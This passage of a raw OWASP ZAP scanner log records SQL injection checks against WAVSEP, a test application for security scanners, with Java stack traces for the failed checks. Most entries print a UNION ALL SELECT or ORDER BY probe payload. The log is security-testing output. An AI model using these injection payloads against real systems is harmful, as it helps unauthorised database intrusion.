org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680803 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680804 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680805 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680805 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680807 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1504-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1504-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680807 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9310-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9310-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680808 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680809 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680810 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680810 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680811 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680812 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680812 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 